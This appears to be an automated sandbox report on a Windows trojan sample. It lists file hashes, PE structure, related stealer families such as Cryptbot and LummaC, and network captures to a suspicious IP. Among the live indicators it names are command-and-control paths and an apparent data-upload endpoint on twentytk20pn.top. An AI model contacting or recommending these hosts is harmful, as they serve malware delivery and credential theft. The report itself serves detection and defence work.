                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:S0O8qbVwLk.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:308b5cef77c672f677d2245307116688.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@27/2
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 27
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded IPs from analysis (whitelisted): 52.149.20.212, 20.109.210.53
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target S0O8qbVwLk.exe, PID 6216 because there are no executed function
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: S0O8qbVwLk.exe
Time | Type | Description
11:05:45 | API Interceptor | 223647x Sleep call for process: S0O8qbVwLk.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
98.85.100.80 | QnYodX3dYf.exe | malicious | Cryptbot |
98.85.100.80 | EMasovlyrQ.exe | malicious | Unknown |
98.85.100.80 | h9CywWZk71.exe | malicious | Cryptbot |
98.85.100.80 | icDcFzyHRy.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | 5ZH9uXmzGP.exe | malicious | Unknown |
98.85.100.80 | u16wYpJpGE.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | HZhObFuFNe.exe | malicious | Unknown |
98.85.100.80 | t6VDbnvGeN.exe | malicious | Unknown |
98.85.100.80 | CMpuGis28l.exe | malicious | Unknown |
98.85.100.80 | u57m8aCdwb.exe | malicious | Unknown |
147.45.113.159 | EMasovlyrQ.exe | malicious | Unknown | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
147.45.113.159 | oJkvQZYkrx.exe | malicious | Unknown | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
147.45.113.159 | f9bcOz8SxR.exe | malicious | Unknown | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
147.45.113.159 | u16wYpJpGE.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
147.45.113.159 | 1o81tDUu5M.exe | malicious | Unknown | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
147.45.113.159 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | twentytk20pn.top/v1/upload.php
147.45.113.159 | file.exe | malicious | LummaC, Amadey, LummaC Stealer | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=2Rb3R6cTcShMDFLr1734664370
147.45.113.159 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | twentytk20pn.top/v1/upload.php
147.45.113.159 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=aMcIUlaEFPceCafP1734635514
147.45.113.159 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig | twentytk20pn.top/v1/upload.php

Match | Associated Sample Name / URL | Detection | Threat Name | Context
home.twentytk20pn.top | EMasovlyrQ.exe | malicious | Unknown | 147.45.113.159
home.twentytk20pn.top | oJkvQZYkrx.exe | malicious | Unknown | 147.45.113.159
home.twentytk20pn.top | f9bcOz8SxR.exe | malicious | Unknown | 147.45.113.159
home.twentytk20pn.top | u16wYpJpGE.exe | malicious | Clipboard Hijacker, Cryptbot | 147.45.113.159
home.twentytk20pn.top | 1o81tDUu5M.exe | malicious | Unknown | 147.45.113.159
home.twentytk20pn.top | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 147.45.113.159
home.twentytk20pn.top | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 147.45.113.159
home.twentytk20pn.top | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 147.45.113.159
home.twentytk20pn.top | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer | 147.45.113.159
home.twentytk20pn.top | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig | 147.45.113.159
httpbin.org | nojxbVm8i4.exe | malicious | Cryptbot | 34.226.108.155
httpbin.org | QnYodX3dYf.exe | malicious | Cryptbot | 98.85.100.80
httpbin.org | WP6s7cCLzr.exe | malicious | Unknown | 34.226.108.155
httpbin.org | EMasovlyrQ.exe | malicious | Unknown | 98.85.100.80
httpbin.org | h9CywWZk71.exe | malicious | Cryptbot | 98.85.100.80
httpbin.org | oJkvQZYkrx.exe | malicious | Unknown | 34.226.108.155
httpbin.org | icDcFzyHRy.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | 5ZH9uXmzGP.exe | malicious | Unknown | 98.85.100.80
httpbin.org | 2M43DSi2cx.exe | malicious | Unknown | 34.226.108.155
httpbin.org | f9bcOz8SxR.exe | malicious | Unknown | 34.226.108.155

Match | Associated Sample Name / URL | Detection | Threat Name | Context
TWC-11351-NORTHEASTUS | QnYodX3dYf.exe | malicious | Cryptbot | 98.85.100.80
TWC-11351-NORTHEASTUS | EMasovlyrQ.exe | malicious | Unknown | 98.85.100.80
TWC-11351-NORTHEASTUS | h9CywWZk71.exe | malicious | Cryptbot | 98.85.100.80
TWC-11351-NORTHEASTUS | icDcFzyHRy.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
TWC-11351-NORTHEASTUS | 5ZH9uXmzGP.exe | malicious | Unknown | 98.85.100.80
TWC-11351-NORTHEASTUS | u16wYpJpGE.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
TWC-11351-NORTHEASTUS | HZhObFuFNe.exe | malicious | Unknown | 98.85.100.80
TWC-11351-NORTHEASTUS | t6VDbnvGeN.exe | malicious | Unknown | 98.85.100.80
TWC-11351-NORTHEASTUS | CMpuGis28l.exe | malicious | Unknown | 98.85.100.80
TWC-11351-NORTHEASTUS | u57m8aCdwb.exe | malicious | Unknown | 98.85.100.80
FREE-NET-ASFREEnetEU | EMasovlyrQ.exe | malicious | Unknown | 147.45.113.159
FREE-NET-ASFREEnetEU | oJkvQZYkrx.exe | malicious | Unknown | 147.45.113.159
FREE-NET-ASFREEnetEU | f9bcOz8SxR.exe | malicious | Unknown | 147.45.113.159
FREE-NET-ASFREEnetEU | u16wYpJpGE.exe | malicious | Clipboard Hijacker, Cryptbot | 147.45.113.159
FREE-NET-ASFREEnetEU | 1o81tDUu5M.exe | malicious | Unknown | 147.45.113.159
FREE-NET-ASFREEnetEU | Captcha.hta | malicious | LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer | 147.45.44.131
FREE-NET-ASFREEnetEU | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 147.45.113.159
FREE-NET-ASFREEnetEU | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 147.45.113.159
FREE-NET-ASFREEnetEU | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 147.45.113.159
FREE-NET-ASFREEnetEU | https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6i | malicious | HTMLPhisher | 147.45.179.98
                                                      No context
                                                      No created / dropped files found
                                                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                      Entropy (8bit):7.985923344389873
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • VXD Driver (31/22) 0.00%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:S0O8qbVwLk.exe
                                                      File size:4'453'888 bytes
                                                      MD5:308b5cef77c672f677d2245307116688
                                                      SHA1:7c71404394a0f8cc5db7e045b1397211fd5ccf8c
                                                      SHA256:5c6029db1e5fd370a90763ce8f2f2ab02a4188c4f82e342a7dca9fcba555156f
                                                      SHA512:f0769aa004fc0767adb29dde125d2c234bdfa04fa7386fc5838ed3d114ac108cb803a752a75cfe3c9e107db5d27f39e96986cfc80b24dab9fd244c29ad2931cc
                                                      SSDEEP:98304:g/UQRVyBPZZS4iRflYW4hceyGKOBenMcNCYH:g/UQR4044ltUceyhOEn3LH
                                                      TLSH:5E26336C8D734AD0D6864F32AFD10FF8B304D942F3E5A9B53944C12F5627B3A56284DA
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@.................................z.D...@... ............................
                                                      Icon Hash:00928e8e8686b000
                                                      Entrypoint:0xf5d000
                                                      Entrypoint Section:.taggant
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                      DLL Characteristics:DYNAMIC_BASE
                                                      Time Stamp:0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61905f | 0x73 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x618000 | 0x2b0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb5b920 | 0x10 | eqznuyix |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xb5b8d0 | 0x18 | eqznuyix |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| | 0x1000 | 0x617000 | 0x283e00 | 4a7546e2cb952a54206aa3a8f434be79 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x618000 | 0x2b0 | 0x200 | ba47030321b93dac4d8504462cebfbbd | False | 0.79296875 | data | 6.10569419597555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x619000 | 0x1000 | 0x200 | e8fbf92e0939d0cd4935f0fe539e974d | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x61a000 | 0x38a000 | 0x200 | e338bee330c1aef007940f47b55c7487 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| eqznuyix | 0x9a4000 | 0x1b8000 | 0x1b7c00 | fddb44ef156e9750cba4bea8955ed713 | False | 0.9943493728681069 | data | 7.95498516764781 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| ewsdhmii | 0xb5c000 | 0x1000 | 0x400 | 4e6517204e527ad66f73f9b04fa7188c | False | 0.7666015625 | data | 6.044515103503593 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0xb5d000 | 0x3000 | 0x2200 | 3bf84d25dd697a385848848a450db588 | False | 0.06824448529411764 | DOS executable (COM) | 0.75607975261635 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_MANIFEST | 0xb5b930 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535 |

| DLL | Import |
| --- | --- |
| kernel32.dll | lstrcpy |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Dec 20, 2024 17:05:23.686099052 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.686161995 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.686166048 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.686175108 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.686264992 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.686274052 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.686332941 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.686363935 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.686606884 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.686610937 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.686878920 CET4971780192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:23.686908007 CET4971780192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:23.802336931 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802349091 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802450895 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802455902 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802602053 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802629948 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802707911 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802712917 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802864075 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802969933 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802975893 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802984953 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802990913 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.802999973 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803097963 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803102016 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803107977 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803112984 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803235054 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803245068 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803297043 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803383112 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803421974 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803523064 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803586006 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803591013 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803639889 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803644896 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803685904 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803765059 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803941011 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.803946018 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804001093 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804176092 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804181099 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804184914 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804222107 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804225922 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804336071 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804347038 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804460049 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804466009 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804497957 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804570913 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804574966 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804593086 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804698944 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804769993 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804775953 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804847956 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804858923 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804863930 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.804948092 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.805064917 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.805377007 CET4971780192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:23.806504965 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.806592941 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.806596994 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.806607008 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.806637049 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.806785107 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.806828022 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807002068 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807007074 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807058096 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807261944 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807405949 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807462931 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807499886 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807532072 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807660103 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807665110 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807785988 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807797909 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807825089 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807858944 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.807974100 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808034897 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808151007 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808160067 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808180094 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808185101 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808305025 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808310032 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808319092 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808324099 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808367014 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808372021 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808410883 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808496952 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808501959 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808511019 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808557034 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808561087 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808610916 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808660984 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808706999 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808790922 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808795929 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808834076 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808916092 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808967113 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808976889 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.808980942 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.809055090 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.809058905 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.809068918 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.809073925 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.809441090 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925049067 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925064087 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925189972 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925194979 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925296068 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925299883 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925374031 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925407887 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925468922 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925474882 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925594091 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925597906 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925610065 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925672054 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925718069 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925723076 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925798893 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925827026 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925908089 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925925970 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.925987005 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926000118 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926098108 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926103115 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926160097 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926276922 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926280975 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926296949 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926387072 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926493883 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926507950 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926512003 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926551104 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926554918 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926667929 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:23.926686049 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.038645029 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.038716078 CET4971780192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:55.039227009 CET4971780192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:55.158716917 CET8049717147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.412308931 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:55.531754017 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.531922102 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:55.533757925 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:55.654145002 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.654160023 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.654169083 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.654179096 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.654187918 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.654198885 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.654208899 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.654217005 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.654242039 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.654373884 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:55.654381037 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.654481888 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:55.774106026 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.774127007 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.774138927 CET8049725147.45.113.159192.168.2.6
